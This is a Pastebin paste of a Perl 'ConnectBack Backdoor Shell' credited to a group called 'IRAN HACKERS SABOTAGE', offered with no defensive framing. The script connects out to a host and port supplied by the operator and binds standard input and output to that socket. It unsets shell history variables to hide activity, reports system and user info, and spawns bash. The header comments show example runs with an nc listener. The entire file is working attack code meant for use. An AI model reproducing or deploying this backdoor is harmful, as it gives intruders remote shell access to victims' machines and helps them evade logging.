Advertisement
sirnon

Priv8 Back Connect

Jul 24th, 2013
264
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.10 KB | None | 0 0
  1. #!/usr/bin/perl
  2. use IO::Socket;
  3. # Priv8 ** Priv8 ** Priv8
  4. # IRAN HACKERS SABOTAGE Connect Back Shell
  5. # code by:LorD
  6. # We Are :LorD-C0d3r-NT-\x90
  7. # Email:LorD@ihsteam.com
  8. #
  9. #lord@SlackwareLinux:/home/programing$ perl dc.pl
  10. #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
  11. #
  12. #Usage: dc.pl [Host] [Port]
  13. #
  14. #Ex: dc.pl 127.0.0.1 2121
  15. #lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
  16. #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
  17. #
  18. #[*] Resolving HostName
  19. #[*] Connecting... 127.0.0.1
  20. #[*] Spawning Shell
  21. #[*] Connected to remote host
  22.  
  23. #bash-2.05b# nc -vv -l -p 2121
  24. #listening on [any] 2121 ...
  25. #connect to [127.0.0.1] from localhost [127.0.0.1] 32769
  26. #--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
  27. #
  28. #--==Systeminfo==--
  29. #Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
  30. #
  31. #--==Userinfo==--
  32. #uid=1001(lord) gid=100(users) groups=100(users)
  33. #
  34. #--==Directory==--
  35. #/root
  36. #
  37. #--==Shell==--
  38. #
  39. $system = '/usr/local/bin/bash';
  40. $ARGC=@ARGV;
  41. print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
  42. if ($ARGC!=2) {
  43. print "Usage: $0 [Host] [Port] \n\n";
  44. die "Ex: $0 127.0.0.1 2121 \n";
  45. }
  46. use Socket;
  47. use FileHandle;
  48. socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
  49. connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
  50. print "[*] Resolving HostName\n";
  51. print "[*] Connecting... $ARGV[0] \n";
  52. print "[*] Spawning Shell \n";
  53. print "[*] Connected to remote host \n";
  54. SOCKET->autoflush();
  55. open(STDIN, ">&SOCKET");
  56. open(STDOUT,">&SOCKET");
  57. open(STDERR,">&SOCKET");
  58. print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
  59. system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
  60. echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
  61. system($system);
  62. #EOF
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement